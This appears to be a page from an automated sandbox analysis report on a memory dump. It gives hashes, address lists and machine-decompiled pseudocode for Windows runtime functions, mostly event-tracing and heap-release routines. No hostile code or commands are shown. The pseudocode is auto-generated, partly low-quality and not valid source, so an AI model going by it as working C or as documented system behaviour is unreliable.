0x1e3a91ee
0x1e3a91f3
0x1e3a91f3
0x1e3a91f3
0x1e3a91e7
0x00000000
0x00000000
0x00000000
0x1e3a9134
0x1e3a9125
0x1e3a911d
0x1e3a914e
0x1e3a90d1
0x1e3a90d1
0x1e3a90d3
0x1e3a90d6
0x1e3a90d8
0x00000000
0x1e3a90d8
0x1e3a90cf

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8479dc73f8e436f5005f56557d8f06e471dfd11e79d4cefdb393f0eb9a13c393
Instruction ID: afad7567b8f9d42ef8cd3e45072b214284e355ebe1d49c2eaa5b1a910d2ca7ba
Opcode Fuzzy Hash: 8479dc73f8e436f5005f56557d8f06e471dfd11e79d4cefdb393f0eb9a13c393
Instruction Fuzzy Hash: C801F4765116508FC3148F19E880B05BBAAEF89760F2543A6E205EB691C374DC81CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1E474015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1E474015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E1E3C2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E1E3C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x1e4986ac);
					E1E3AF900(0x1e4986d4, _t28);
					E1E3BFFB0(0x1e4986ac, _t28, 0x1e4986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E1E3BFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x1e47401a
0x1e47401e
0x1e474023
0x1e474028
0x1e474029
0x1e47402b
0x1e47402f
0x1e474043
0x1e474046
0x1e474051
0x1e474057
0x1e47405f
0x1e474062
0x1e474067
0x1e47406f
0x1e47407c
0x1e47407c
0x1e47408c
0x1e47408c
0x1e474097

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492ff4e6731ed628cdb2c9f455c0461d2b67845ac33c9c16cca6c2b43727e4bc
Instruction ID: fa8f4bb095670abfc974c72cb0f65e974228e33b9cbbef0fbef80274f8a7e268
Opcode Fuzzy Hash: 492ff4e6731ed628cdb2c9f455c0461d2b67845ac33c9c16cca6c2b43727e4bc
Instruction Fuzzy Hash: C3018F76601985BFD2519B79CD84E67F7ACEF89660B00072AB50887A11CB25FC51C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 1E46138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E1E46138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1e49d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1E3EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E1E3C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x1e46138a
0x1e46138a
0x1e461399
0x1e4613a3
0x1e4613a8
0x1e4613aa
0x1e4613b5
0x1e4613bb
0x1e4613c3
0x1e4613c6
0x1e4613c9
0x1e4613d4
0x1e4613e6
0x1e4613d6
0x1e4613df
0x1e4613df
0x1e4613f1
0x1e4613f2
0x1e4613f4
0x1e4613f9
0x1e46140e

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d82dfff8f4b558ab6e81155a436dee8e52ce34ac64d0ad13daac94996a9a72d
Instruction ID: f0d8a50972b035f3ebdceaeb50e3aa79774b07cc4d4b5410f5011d272d474652
Opcode Fuzzy Hash: 6d82dfff8f4b558ab6e81155a436dee8e52ce34ac64d0ad13daac94996a9a72d
Instruction Fuzzy Hash: 2E018075A00258AFDB14DFA9D881AAEB7B8EF44700F004156B905AB380D670EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E4614FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E1E4614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1e49d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1E3EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E1E3C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x1e4614fb
0x1e4614fb
0x1e46150a
0x1e461514
0x1e461519
0x1e46151b
0x1e461526
0x1e46152c
0x1e461534
0x1e461537
0x1e46153a
0x1e461545
0x1e461557
0x1e461547
0x1e461550
0x1e461550
0x1e461562
0x1e461563
0x1e461565
0x1e46156a
0x1e46157f

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edff970cde41f6baa1f59825b840bafa6231ee1a7ca8f5d99695c0fcb8ccba4a
Instruction ID: f2dc8721b328ccf0467b1c0d15c43b5b249f2c605d8e55e227f92f1003ced69e
Opcode Fuzzy Hash: edff970cde41f6baa1f59825b840bafa6231ee1a7ca8f5d99695c0fcb8ccba4a
Instruction Fuzzy Hash: 75019E75A00258AFCB14DFA9D846EAEBBB8EF44700F404166F905EB380DB70EE40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1E3A58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x1e49d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1e385c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E1E3A5943() != 0 &&  *0x1e495320 > 5) {
					E1E427B5E( &_v44, _t27);
					_t22 =  &_v28;
					E1E427B5E( &_v28, _t28);
					_t11 = E1E427B9C(0x1e495320, 0x1e38bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E1E3EB640(_t11, _t17, _v8 ^ _t29, 0x1e38bf15, _t27, _t28);
			}

0x1e3a58fb
0x1e3a58fe
0x1e3a5906
0x1e3a590a
0x1e3a593c
0x1e3a593c
0x1e3a590c
0x1e3a590c
0x1e3a5911
0x00000000
0x1e3a5913
0x1e3a5913
0x1e3a5913
0x1e3a5911
0x1e3a591d
0x1e401035
0x1e40103c
0x1e40103f
0x1e401056
0x1e401056
0x1e3a593b

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041c8cfc1f14fcd779f15b4484b09c9cdad307975a201912c1cc6690096a7b57
Instruction ID: 1be66526861f9918496372ca329e81e92d7ee176031130b0cbac60e45972b9dc
Opcode Fuzzy Hash: 041c8cfc1f14fcd779f15b4484b09c9cdad307975a201912c1cc6690096a7b57
Instruction Fuzzy Hash: 3701DF39A00105BBC728CB2AE8549AE77ADEF84230FD1036EE901EB284DF30ED41C790

Uniqueness

Uniqueness Score: -1.00%

Function 1E45FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E1E45FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1e49d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1E3EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E1E3C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1e45fe3f
0x1e45fe3f
0x1e45fe4e
0x1e45fe58
0x1e45fe5d
0x1e45fe5f
0x1e45fe6a
0x1e45fe72
0x1e45fe75
0x1e45fe78
0x1e45fe83
0x1e45fe95
0x1e45fe85
0x1e45fe8e
0x1e45fe8e
0x1e45fea0
0x1e45fea1
0x1e45fea3
0x1e45fea8
0x1e45febd

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec6acdcdc6c2c644ff9b26da1f04b406eed4c979a95acad57d5a796468098f5
Instruction ID: d8eb8b9b90ad7ada90fbc51f3770d5f99de756529824fbace81ae65dd2962cae
Opcode Fuzzy Hash: 9ec6acdcdc6c2c644ff9b26da1f04b406eed4c979a95acad57d5a796468098f5
Instruction Fuzzy Hash: 3F018475E00258AFCB14DFA9D846FAEB7B8EF44700F014566F900AB781DA70E941CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1E45FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E1E45FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1e49d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1E3EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E1E3C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1e45fec0
0x1e45fec0
0x1e45fecf
0x1e45fed9
0x1e45fede
0x1e45fee0
0x1e45feeb
0x1e45fef3
0x1e45fef6
0x1e45fef9
0x1e45ff04
0x1e45ff16
0x1e45ff06
0x1e45ff0f
0x1e45ff0f
0x1e45ff21
0x1e45ff22
0x1e45ff24
0x1e45ff29
0x1e45ff3e

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b3c5007bd5ec8fa48bf0f0caf39ca39640febfce1bb3cc07527f3b2e6c8570
Instruction ID: 48b4c860b614f91b866ec547e7ac77d101678abaed87c94f2274f91b3f94257e
Opcode Fuzzy Hash: b4b3c5007bd5ec8fa48bf0f0caf39ca39640febfce1bb3cc07527f3b2e6c8570
Instruction Fuzzy Hash: E0018475E00258AFCB14DFA9D845FAEB7B8EF44700F404166F901AB780DA70EA41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1E3BB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E1E3C7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E1E427016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x1e3bb037
0x1e3bb039
0x1e3bb03b
0x1e3bb040
0x1e40a60e
0x00000000
0x00000000
0x1e40a61d
0x1e3bb04b
0x1e3bb04e
0x1e40a627
0x1e40a634
0x00000000
0x00000000
0x1e40a641
0x1e40a653
0x1e40a643
0x1e40a64c
0x1e40a64c
0x1e40a65b
0x00000000
0x00000000
0x00000000
0x1e40a66c
0x1e3bb057
0x1e3bb057
0x1e3bb057
0x1e3bb046
0x1e3bb046
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: b21c76e2c6b9818d28d50b254e87f41d4de88444d94ac17039f030f3bb080fea
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 61018F72A009C09FD326C769C994FA677EDEB85754F0506F2F91ACBA51DB68DC40C620

Uniqueness

Uniqueness Score: -1.00%

Function 1E471074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E471074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E1E47165E(__ebx, 0x1e498ae4, (__edx -  *0x1e498b04 >> 0x14) + (__edx -  *0x1e498b04 >> 0x14), __edi, __ecx, (__edx -  *0x1e498b04 >> 0x14) + (__edx -  *0x1e498b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E1E46AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E1E3C7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E1E45FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x1e471074
0x1e471080
0x1e471082
0x1e47108a
0x1e47108f
0x1e471093
0x1e4710ab
0x1e4710ab
0x1e4710c3
0x1e4710cf
0x1e4710e1
0x1e4710d1
0x1e4710da
0x1e4710da
0x1e4710e9
0x1e4710f5
0x1e4710f5
0x1e4710fe

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de912dfc2e3dcaad9f7edb9786f36b270ec337361680e95ad047738836aa948
Instruction ID: 0344f42baea743238009834e9972daed3885cad8e006d88cbc7feebaefdf214b
Opcode Fuzzy Hash: 2de912dfc2e3dcaad9f7edb9786f36b270ec337361680e95ad047738836aa948
Instruction Fuzzy Hash: 290128769047819BC701DF39C844B5AB7D6AB88210F008B1BF88693B91DF30E844CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 1E478A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1E478A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1e49d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1E3C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x1e478a62
0x1e478a71
0x1e478a79
0x1e478a82
0x1e478a85
0x1e478a89
0x1e478a8c
0x1e478a8f
0x1e478a92
0x1e478a95
0x1e478a9f
0x1e478ab1
0x1e478aa1
0x1e478aaa
0x1e478aaa
0x1e478abc
0x1e478abd
0x1e478abf
0x1e478ac4
0x1e478ada

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1584ddb67d71b7584d65c0150a9bff2586aec8d5118db2360547bcc37e760856
Instruction ID: 2fc4c8413c248282349edc863eb6e1c1ab766dd84c987c46692817308589852d
Opcode Fuzzy Hash: 1584ddb67d71b7584d65c0150a9bff2586aec8d5118db2360547bcc37e760856
Instruction Fuzzy Hash: B9011AB5A00269AFDB04DFA9D9419EEBBB8FF48310F10455AF905F7341D734A9018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E478ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1E478ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x1e49d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E1E3C7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x1e478ed6
0x1e478ee5
0x1e478eed
0x1e478ef0
0x1e478efa
0x1e478f03
0x1e478f0c
0x1e478f15
0x1e478f24
0x1e478f27
0x1e478f31
0x1e478f43
0x1e478f33
0x1e478f3c
0x1e478f3c
0x1e478f4e
0x1e478f4f
0x1e478f51
0x1e478f56
0x1e478f69

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f916e1db75f20cb3e89f6fb01ea33463187b85efc1983e99f00f1f443b4e4c7d
Instruction ID: 518a92322fcdc2d15a92f60295c1feca2cf3510bad9576259b59d72feada4d26
Opcode Fuzzy Hash: f916e1db75f20cb3e89f6fb01ea33463187b85efc1983e99f00f1f443b4e4c7d
Instruction Fuzzy Hash: F0110C74E002599FDB04DFA9D541AAEF7F4BF08300F0442AAE919EB781E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3ADB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3ADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E1E3ADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E1E3AE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L1E3AE8B0(__ecx, _t14, 0xfff);
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x1e3adb64
0x1e3adb66
0x1e3adb6b
0x1e3adbaa
0x1e3adb71
0x1e3adb76
0x1e3adb7a
0x1e3adba3
0x1e3adb7c
0x1e3adb87
0x1e3adb8b
0x1e404fa1
0x1e404fb3
0x1e404fb8
0x1e3adb91
0x1e3adb96
0x1e3adb98
0x1e3adb98
0x1e3adb8b
0x1e3adb7a
0x1e3adb9d
0x1e3adba2

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 4270dbd81d15eec22d95a915ac5e7232d4dd65023d74c7b5d676b79aa26b219c
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 18F0FC37201562DBD3225A56489CF5B769ACFC1A64F160B36F305DB344CB609C82C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E1E3C7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E1E3C7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E1E427016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x1e3ab1e8
0x1e3ab1ea
0x1e3ab1f3
0x1e404a17
0x1e3ab1f9
0x1e3ab1f9
0x1e3ab1f9
0x1e3ab201
0x1e404a21
0x1e404a2e
0x00000000
0x00000000
0x1e404a3b
0x1e404a4d
0x1e404a3d
0x1e404a46
0x1e404a46
0x1e404a55
0x00000000
0x00000000
0x00000000
0x1e3ab20a
0x1e3ab20a
0x1e3ab20a
0x1e3ab20a

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 60848760cbc7d6feeac8a75d68939e8b52615075bb42a196f80121422f9f2aed
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 5401D1322006C09BD312976AC804F897BDAEF81794F090AB3FA15CBAB2D778DC40C714

Uniqueness

Uniqueness Score: -1.00%

Function 1E43FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E1E43FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x1e49d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E1E3C7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1E3EB640(E1E3E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x1e43fe96
